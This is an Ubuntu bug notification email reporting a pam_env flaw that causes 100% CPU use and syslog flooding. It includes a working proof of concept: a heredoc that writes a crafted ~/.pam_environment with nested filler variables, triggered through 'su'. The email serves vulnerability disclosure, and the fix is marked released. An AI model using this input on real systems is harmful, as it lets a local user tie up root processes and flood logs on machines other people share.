*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Marc Deslauriers
(mdeslaur):
The pam_env variable expansion routine does not correctly abort under
some situations when expending variable names. This triggers 100% CPU
use and syslog flooding.
To reproduce:
cat <<EOM >~/.pam_environment
EVIL_FILLER_255
DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024
DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191
DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM
This will trigger CPU usage for whatever process runs the PAM stack. For
example, to make root run away, run "su - $USER" and correctly
authenticate.
** Affects: pam (Ubuntu)
Importance: Undecided
Status: Fix Released
--
100% CPU utilitization in pam_env parsing
https://bugs.launchpad.net/bugs/874565
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
